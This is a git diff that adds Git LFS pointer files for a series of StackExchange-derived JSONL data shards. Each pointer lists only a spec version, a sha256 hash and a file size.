0000000000000000000000000000000000000000..f373521a63efb481a363e1529ce75877c3fce612 --- /dev/null +++ b/data/stackexchange/1-1/279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f82535f96e915954eabb0115caa0e47690f8e5234c9a58b486935b2108206e1 +size 34969901 diff --git a/data/stackexchange/1-1/27_2289.jsonl b/data/stackexchange/1-1/27_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96dd362dfeaa68d4a77ca37e54f8940cf9c489ab --- /dev/null +++ b/data/stackexchange/1-1/27_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee38116e0269fb4310557abcde00f7853fe144a495bb523cd7024c86e8eecaa9 +size 36164165 diff --git a/data/stackexchange/1-1/280_2289.jsonl b/data/stackexchange/1-1/280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39e4b854bb1b9902d9515499593c8ed955d940d5 --- /dev/null +++ b/data/stackexchange/1-1/280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86e6ee833bd366e8396ae76de64aa6eac51c389899797926d16a7a33e5fa514a +size 35347384 diff --git a/data/stackexchange/1-1/281_2289.jsonl b/data/stackexchange/1-1/281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e439164f6f5741c2a6283897f2c6746ca3dde80 --- /dev/null +++ b/data/stackexchange/1-1/281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8db4f979a02acdd2cae8baab1d878a35b64b3e79563435264744cbb2f58c8435 +size 35115379 diff --git a/data/stackexchange/1-1/282_2289.jsonl b/data/stackexchange/1-1/282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1c58a5e4c95d3bda86bc0f54a6a4439624b0004 --- /dev/null +++ b/data/stackexchange/1-1/282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:259f2a971ad636e40db50fc9f5a21f4e8922ff5729206ee3afb323178c0143fc +size 35735641 diff --git a/data/stackexchange/1-1/283_2289.jsonl b/data/stackexchange/1-1/283_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f719f60f1e31343f9b4f8dd203885b437a22680 --- /dev/null +++ b/data/stackexchange/1-1/283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49abcae5a8b95022c99519fe0313b1281ff6734bb7657e5608aea9e96d4ed992 +size 34735074 diff --git a/data/stackexchange/1-1/284_2289.jsonl b/data/stackexchange/1-1/284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b52f6d450962f955b3d3a4a8f64f2d1a0bd9952a --- /dev/null +++ b/data/stackexchange/1-1/284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:300452266cc326697ee7a5996a4f1dd36e08ba1c4bf58be977f8132052b6125f +size 35675773 diff --git a/data/stackexchange/1-1/285_2289.jsonl b/data/stackexchange/1-1/285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b162c890043cd5b810f07d19358c91d21daed8e --- /dev/null +++ b/data/stackexchange/1-1/285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fde1d825cdccde516c113f906eff6c516cde4ec0256ff242d9a0b524f8add9d8 +size 35071435 diff --git a/data/stackexchange/1-1/286_2289.jsonl b/data/stackexchange/1-1/286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3fcba0fd1fb4c5796f4ec2c896a542c0591c295 --- /dev/null +++ b/data/stackexchange/1-1/286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6f773ba7b2bc4421fb85d3d15d25badb8886add7527382f2c4592e625ebabc37 +size 35147812 diff --git a/data/stackexchange/1-1/287_2289.jsonl b/data/stackexchange/1-1/287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..147163baf22bc0bca6958b4c555e9a5896ea18c7 --- /dev/null +++ b/data/stackexchange/1-1/287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e740325d15341750f47dacc984b7cd9fb7040333ad6340e07378427377e293a0 +size 35490437 diff --git a/data/stackexchange/1-1/288_2289.jsonl b/data/stackexchange/1-1/288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d88ca6dec38fcb79f6cccdbdd5ab0847ced79b0 --- /dev/null +++ b/data/stackexchange/1-1/288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b87d8d2eb5a6d67a888403b81faaac279928700e37a5d0928414a4d63f99f043 +size 35512946 diff --git a/data/stackexchange/1-1/289_2289.jsonl b/data/stackexchange/1-1/289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02c0407fb4b3e656a9fb6706a208fd787399dc62 --- /dev/null +++ b/data/stackexchange/1-1/289_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d970f54057dc60c11220de073011cdd0d60ee4a9db3433cddbbc144b4c0e2b77 +size 35614267 diff --git a/data/stackexchange/1-1/28_2289.jsonl b/data/stackexchange/1-1/28_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cbbc0c1e4353a8311a1e6359918c53f5172de32a --- /dev/null +++ b/data/stackexchange/1-1/28_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aff8275fa6562979825b2b67694d8f10c1db194ff1d8cd1f907a549cdc518f02 +size 35846513 diff --git a/data/stackexchange/1-1/290_2289.jsonl b/data/stackexchange/1-1/290_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37a2d9acac1295f647bd507581946c559726c73e --- /dev/null +++ b/data/stackexchange/1-1/290_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95836b95a6d3a82802a3f1c9501c6e00892abede37259af0e2144a085b897d6f +size 35924505 diff --git a/data/stackexchange/1-1/291_2289.jsonl b/data/stackexchange/1-1/291_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a85a836d9fdf54605571b44f5876e8bd03b59be6 --- /dev/null +++ b/data/stackexchange/1-1/291_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0de0071dadc0e359b0aef43c6673f2ff5d20bbba81428a835ff420148880ed7c +size 35257511 diff --git a/data/stackexchange/1-1/292_2289.jsonl b/data/stackexchange/1-1/292_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4253a08fb8e551d9d1915bed5f6f33946ac9cf3 --- /dev/null +++ b/data/stackexchange/1-1/292_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:beaa90dd99645839359aefae5847063bd50ac1760a9c08c4c2c2f6f0adca1072 +size 35685761 diff --git a/data/stackexchange/1-1/293_2289.jsonl b/data/stackexchange/1-1/293_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a171b70fb96c9a29c9225521d69b41cef0fe85f --- /dev/null +++ b/data/stackexchange/1-1/293_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:733b1e6c30a2fb50b805e90526bcea334d11dd3789f7f90a5131e5686d7f2ff1 +size 34959118 diff --git a/data/stackexchange/1-1/294_2289.jsonl b/data/stackexchange/1-1/294_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..38fc4ac9769129dc8b51c1b00df5abbc94f0a0cb --- /dev/null +++ b/data/stackexchange/1-1/294_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0977ae53a123d316b120e8ce2ee97aece696e6f6383ddcfc7f97e96ef3b54d14 +size 35468208 diff --git a/data/stackexchange/1-1/295_2289.jsonl b/data/stackexchange/1-1/295_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec819eb29a139f5c3d747ee9b87aa77e1ca299cf --- /dev/null +++ b/data/stackexchange/1-1/295_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:897ac12303bb0bd9fe50a9135d2eec4bf6f1d4ac0754826d3a532f0669288386 +size 34976707 diff --git a/data/stackexchange/1-1/296_2289.jsonl b/data/stackexchange/1-1/296_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b41c293f9a5e14a92ce808a9947913266b49450 --- /dev/null +++ b/data/stackexchange/1-1/296_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27b1f2052f3d76b9c48901fea1835e82f60bf0c210ade8ea021ad6c138c6b847 +size 35125933 diff --git a/data/stackexchange/1-1/297_2289.jsonl b/data/stackexchange/1-1/297_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f201ceeb33cd5d47719a9f41d0222dc32b29793f --- /dev/null +++ b/data/stackexchange/1-1/297_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c8e5632392ebee4d623377366a3bfb553e63d812495d01e54555afe78580cb8 +size 35380971 diff --git a/data/stackexchange/1-1/298_2289.jsonl b/data/stackexchange/1-1/298_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d6b6cd9f8a192eb19ae28a3b3c082eaf3d0b9f7 --- /dev/null +++ b/data/stackexchange/1-1/298_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baaeb180390039fd18f35f19509e2abd86f8077cc830f0e84ea8bc922863868e +size 35018160 diff --git a/data/stackexchange/1-1/299_2289.jsonl b/data/stackexchange/1-1/299_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..229144dd0d699ea46d0146bbc17221aa5347dab8 --- /dev/null +++ b/data/stackexchange/1-1/299_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c97d1bc1eca3046f3f91f99ff3ec7eb475959b7cb4a5a0bf278597543f4d2bfd +size 35105850 diff --git a/data/stackexchange/1-1/29_2289.jsonl b/data/stackexchange/1-1/29_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ee4f7426d0b3d6071ca91887f5f919059b398b3 --- /dev/null +++ b/data/stackexchange/1-1/29_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1a963ba2a7bcff73e3bdb85d95d098d1623911995319c957769cfa8dc0019b5 +size 35315925 diff --git a/data/stackexchange/1-1/2_2289.jsonl b/data/stackexchange/1-1/2_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53f4d8679e513ba2863a0c8a44a106f271d12fd9 --- /dev/null +++ b/data/stackexchange/1-1/2_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2c15280510c656ab2af5e5fa94437a8c09298ce9db28d06773e5a614258ef81 +size 35794513 diff --git a/data/stackexchange/1-1/300_2289.jsonl b/data/stackexchange/1-1/300_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f80a63583f33743f0fb1039012b6ca859f3b7560 --- /dev/null +++ b/data/stackexchange/1-1/300_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:75881533085deab8ddf69c0e8b4ef6fa13cbfc4705df7d3bfc879308c5f4c563 +size 39065119 diff --git a/data/stackexchange/1-1/301_2289.jsonl b/data/stackexchange/1-1/301_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1fe435d89dbdbc720202434c6a6bb9c7617665c --- /dev/null +++ b/data/stackexchange/1-1/301_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fbd77d5d90277aa3fe3d8868092591004afa0d51c6f56ce0580b8139157dde8 +size 38351770 diff --git a/data/stackexchange/1-1/302_2289.jsonl b/data/stackexchange/1-1/302_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..435c021dfcff5242b8b0cbef29633e21860ba394 --- /dev/null +++ b/data/stackexchange/1-1/302_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2ff571fea0675bfe40b4bf58871a7a5f9ee6adc0dcb5009d1e7e80add5c0aeb +size 39173010 diff --git a/data/stackexchange/1-1/303_2289.jsonl b/data/stackexchange/1-1/303_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..151f7aecfa3728fe77f8686fd89fd99523ce709a --- /dev/null +++ b/data/stackexchange/1-1/303_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d83a1972a2b5a3b8a7aa2a75f7784210bb2186e0373c37f2890ab6d851480860 +size 39143232 diff --git a/data/stackexchange/1-1/304_2289.jsonl b/data/stackexchange/1-1/304_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc0b02c1153914bb97b1da98bf0dceab3d725f62 --- /dev/null +++ b/data/stackexchange/1-1/304_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0c710e3c5473725e76a852ce5314d7883c468137c679b187751e3eb7468184a3 +size 38636727 diff --git a/data/stackexchange/1-1/305_2289.jsonl b/data/stackexchange/1-1/305_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63ddfd1bb8a83845a81e9cf538a03c219992bd9b --- /dev/null +++ b/data/stackexchange/1-1/305_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21135589a493f5afb7c9990e0b3cf501d06eba7e156fe275a8e70f9b08ff1ae4 +size 38729379 diff --git a/data/stackexchange/1-1/306_2289.jsonl b/data/stackexchange/1-1/306_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9edcddba1ce4516cce88b8a3333b76c401157959 --- /dev/null +++ b/data/stackexchange/1-1/306_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c3e16a73ae8f68ed4b9b6e99f0585196844c1d34ec558315c996258e8e7204f +size 39386909 diff --git a/data/stackexchange/1-1/307_2289.jsonl b/data/stackexchange/1-1/307_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f24aef61efba0c21b90806e737f7d974ac470d74 --- /dev/null +++ b/data/stackexchange/1-1/307_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b42a5194307fb21610e0bbba0aa8c76d5f873c0d8c90b2a454e49661ef98cf0 +size 38720349 diff --git a/data/stackexchange/1-1/308_2289.jsonl b/data/stackexchange/1-1/308_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..875bb6afd9e6ca4bb9267ef0ae4edf07b65e5157 --- /dev/null +++ b/data/stackexchange/1-1/308_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4184ae8c7d0866b528280499119025bc550de81f70fffa19ee595d3e24eabf56 +size 38316808 diff --git a/data/stackexchange/1-1/309_2289.jsonl b/data/stackexchange/1-1/309_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..142d2fc2eb030694c30ce9be84c677b8fd372a62 --- /dev/null +++ b/data/stackexchange/1-1/309_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a4f1907b20068b439ca3b78e9c09043c7259975c5cd7e1ff4d7755fcf104ef1 +size 39080771 diff --git a/data/stackexchange/1-1/30_2289.jsonl b/data/stackexchange/1-1/30_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4458bf22be30e4ad7a84f9a0c4f451e39807ffc --- /dev/null +++ b/data/stackexchange/1-1/30_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6d074bf8ea16d8d93da29723dfb62317d2a41a6e59d97419a495d3132fdb202 +size 35453290 diff --git a/data/stackexchange/1-1/310_2289.jsonl b/data/stackexchange/1-1/310_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d8dbcfedc4b0ac477b9bdc8d1d138aa2d0ad4ed --- /dev/null +++ b/data/stackexchange/1-1/310_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9731179c4200ffff6e9f17cf6cb773505966a8725825eb4b88154f0d59c68bfe +size 39165843 diff --git a/data/stackexchange/1-1/311_2289.jsonl b/data/stackexchange/1-1/311_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f54577921f7958804dd598287234cacd9efada8 --- /dev/null +++ b/data/stackexchange/1-1/311_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c268245c89409fd20b4dd3eb87110809898fc765f151baaa1ef66b623950909 +size 38692463 diff --git a/data/stackexchange/1-1/312_2289.jsonl b/data/stackexchange/1-1/312_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68498f2efd38901267bdd6b47f6ac96dd2acd561 --- /dev/null +++ b/data/stackexchange/1-1/312_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7a42073d86be371238d8de0911d84baee3cc2c47619220173d63ff2f05785e6 +size 38536186 diff --git a/data/stackexchange/1-1/313_2289.jsonl b/data/stackexchange/1-1/313_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f82c10af0af957c551467275c8b3facf784be71b --- /dev/null +++ b/data/stackexchange/1-1/313_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:821517af4662bff5bfb5d1011f7a69a5a95a1cfd5d8e76c86ec1d64f83ad7007 +size 38647683 diff --git a/data/stackexchange/1-1/314_2289.jsonl b/data/stackexchange/1-1/314_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..008f8d5e8226bd62f261661559d24a5a53b12e73 --- /dev/null +++ b/data/stackexchange/1-1/314_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24607e810dbcaa16e078953eab42b116c51ce9cc5ab06c7509ce67e12f340be6 +size 39133588 diff --git a/data/stackexchange/1-1/315_2289.jsonl b/data/stackexchange/1-1/315_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21ca74f18d1a4b94c6656484b17c342d08198007 --- /dev/null +++ b/data/stackexchange/1-1/315_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbd7601caed98849f83f1fdb7223a0fd0d244f86d6a7d2c4d26e51f51977583b +size 38530768 diff --git a/data/stackexchange/1-1/316_2289.jsonl b/data/stackexchange/1-1/316_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc84ff1a396172355714002345819cff6c6a2d4b --- /dev/null +++ b/data/stackexchange/1-1/316_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:9b84040f936af23a8978e0e30b7489d557e020a8360c806861aaa30e44b850bd +size 38605247 diff --git a/data/stackexchange/1-1/317_2289.jsonl b/data/stackexchange/1-1/317_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d48994e1ccecbb54adee17afca44d31b8b5099bc --- /dev/null +++ b/data/stackexchange/1-1/317_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b34e607f89b361942120aeaff776c81a0f15e70f17e7884c0082d08907cec0b +size 38620704 diff --git a/data/stackexchange/1-1/318_2289.jsonl b/data/stackexchange/1-1/318_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a9eac29480d1e9b9454b2b76babea3642124a58 --- /dev/null +++ b/data/stackexchange/1-1/318_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:867374d0329577f470ea44f254e505837ba258a63a04c6456ef44b1a85d9937b +size 38788354 diff --git a/data/stackexchange/1-1/319_2289.jsonl b/data/stackexchange/1-1/319_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98992775c3e0abcc3ee39cc7f5bc9239d80063bf --- /dev/null +++ b/data/stackexchange/1-1/319_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46b155c7262db645f148ce8793403e5cb239490746a214d133fd23074e3d83b2 +size 38828496 diff --git a/data/stackexchange/1-1/31_2289.jsonl b/data/stackexchange/1-1/31_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb4dfe5e69de19f2e82be95ec1de88002ffdf52b --- /dev/null +++ b/data/stackexchange/1-1/31_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8b1aa617374828a5ff30a59e88256c4974930d4e9a028244f84d52ddc3d0c1b +size 36330713 diff --git a/data/stackexchange/1-1/320_2289.jsonl b/data/stackexchange/1-1/320_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ad4c72c199e0c657756b386e1dcf0c80f23524 --- /dev/null +++ b/data/stackexchange/1-1/320_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d21bfaf302003ac8526496e284d03da872aa16ca9b089bd9731aa1a284c0de6 +size 38816393 diff --git a/data/stackexchange/1-1/321_2289.jsonl b/data/stackexchange/1-1/321_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4178e3df391639febc61d9197f45cce694ac9827 --- /dev/null +++ b/data/stackexchange/1-1/321_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da9834365c794f1451bee1a3e062fa03d86640a3ebe9f986849591ccca89a297 +size 38552116 diff --git a/data/stackexchange/1-1/322_2289.jsonl b/data/stackexchange/1-1/322_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7581cbcf71d4cbd514c0ce3d630d52940924ad25 --- /dev/null +++ b/data/stackexchange/1-1/322_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd32635d874e8ba447b406416809a8b12e02922e0001ba5acf9bd7bdeffa0d8e +size 38351420 diff --git a/data/stackexchange/1-1/323_2289.jsonl b/data/stackexchange/1-1/323_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9262041c5ea5e3995525867f7b8da21969f5d66f --- /dev/null +++ b/data/stackexchange/1-1/323_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a373c43a34d57d779c4bd6e5ef6ce75f1fd9105e24ea575485ff189efaef2f0 +size 38651127 diff --git a/data/stackexchange/1-1/324_2289.jsonl b/data/stackexchange/1-1/324_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..088d2a4cbee46cbe885d976585074fced69d083b --- /dev/null +++ b/data/stackexchange/1-1/324_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5044801c92002eda581e4c65898d0eb3b55de7f885cc384ecf8062cc3a4eafb0 +size 38622704 diff --git a/data/stackexchange/1-1/325_2289.jsonl b/data/stackexchange/1-1/325_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fdc3449605f97d5a5eb497d0818c0c14a195d35 --- /dev/null +++ b/data/stackexchange/1-1/325_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3f7cc21dfb51948f3189150c8e22c0379e5bca3a77c5d108d9480cac38eb0b5 +size 39684035 diff --git a/data/stackexchange/1-1/326_2289.jsonl b/data/stackexchange/1-1/326_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3493c7869dad36732db0132560c3a6b3e7d6f744 --- /dev/null +++ b/data/stackexchange/1-1/326_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:caccccce2ce2ec1aae0795c42c3cfdd90268bb4c70fca5d4cc82a21c734bc20f +size 38526302 diff --git a/data/stackexchange/1-1/327_2289.jsonl b/data/stackexchange/1-1/327_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..acd174fa863091aa9bf1b0c954cbf51d7262f7e2 --- /dev/null +++ b/data/stackexchange/1-1/327_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d440b945d4eea91bfdaeeaf396d937a1a3493337de555c20ccd276a5ea9f0184 +size 39154207 diff --git a/data/stackexchange/1-1/328_2289.jsonl b/data/stackexchange/1-1/328_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de9216c599bbbb9914a67a9b5689a42dc577675d --- /dev/null +++ b/data/stackexchange/1-1/328_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41bdfe06bd93edae30cb254862463056ac3d87f16b7d7cde7bd5a1afc6d80ebf +size 38824726 diff --git a/data/stackexchange/1-1/329_2289.jsonl b/data/stackexchange/1-1/329_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18dd74970e2f8ef500a710b7d46a7fa1d7ab0f3a --- /dev/null +++ b/data/stackexchange/1-1/329_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c5a70848d7f764224840b4b0ebdaf1158310b74645dadc457f293654cc73629 +size 38710863 diff --git a/data/stackexchange/1-1/32_2289.jsonl b/data/stackexchange/1-1/32_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e3ce6b7ba79513e1bec152158374e6a72ba7e7f --- /dev/null +++ b/data/stackexchange/1-1/32_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4873c875a99a7f9d42bc752561524622d89fa3ebe77788ff63578d10481e76fe +size 35556838 diff --git a/data/stackexchange/1-1/330_2289.jsonl b/data/stackexchange/1-1/330_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..386796f03d12ba5f9bf73555ed4cfdece94c4a08 --- /dev/null +++ b/data/stackexchange/1-1/330_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d3cf00f341746a2bc501d60b822ceb1d2a1ba6528fc154901d018fabacc5b5c +size 38276458 diff --git a/data/stackexchange/1-1/331_2289.jsonl b/data/stackexchange/1-1/331_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec2f24201ee75740de7d068ac773234a3e29f4e --- /dev/null +++ b/data/stackexchange/1-1/331_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:0caa768b05b57aab50fdce4cacc9fd58b32d7d245e9e2d214b2304872f56c700 +size 38764722 diff --git a/data/stackexchange/1-1/332_2289.jsonl b/data/stackexchange/1-1/332_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aa9e39ef15bc42fcb9900f1435ce4c371a54e37 --- /dev/null +++ b/data/stackexchange/1-1/332_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5bd514761ef99fc21678d094274a52973b44f84b941e81acbcc22c9fe104f92 +size 38945022 diff --git a/data/stackexchange/1-1/333_2289.jsonl b/data/stackexchange/1-1/333_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34b674e118f762c9bafedd70b9afc649f91f419a --- /dev/null +++ b/data/stackexchange/1-1/333_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf563ddda2d9ae724ebab9ac92865979d9e4e3a25c83343d46c1b99b724ceae7 +size 38687846 diff --git a/data/stackexchange/1-1/334_2289.jsonl b/data/stackexchange/1-1/334_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1aff893809a8346651f5cc992a7718f6ee37b431 --- /dev/null +++ b/data/stackexchange/1-1/334_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe54d177c301dca3fb93b3b769f013fcdbaa1d93ebbbc1e0635bae52bd3cd59b +size 38432151 diff --git a/data/stackexchange/1-1/335_2289.jsonl b/data/stackexchange/1-1/335_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e66320a6a70f214143b9dd6fe2113aa811dddbf --- /dev/null +++ b/data/stackexchange/1-1/335_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6deca57eead4516ab25460d5ea8187b9ba30fd9ca8c8b06755a36aec3b815a66 +size 38539471 diff --git a/data/stackexchange/1-1/336_2289.jsonl b/data/stackexchange/1-1/336_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..505571aec3e60367698f339cd057d2e0cb5c1c98 --- /dev/null +++ b/data/stackexchange/1-1/336_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cabfa9d75af0db9f22e21e05a6c494e1aea36df873aa1495a366cf8bc974dac +size 39468941 diff --git a/data/stackexchange/1-1/337_2289.jsonl b/data/stackexchange/1-1/337_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..519ec63aa5a9d376ac55b9758a2da919a12470da --- /dev/null +++ b/data/stackexchange/1-1/337_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2dd1583be869efb0364c08e0d8f9ed86e57a2a836404e7643a68075de4a9516e +size 38014726 diff --git a/data/stackexchange/1-1/338_2289.jsonl b/data/stackexchange/1-1/338_2289.jsonl new 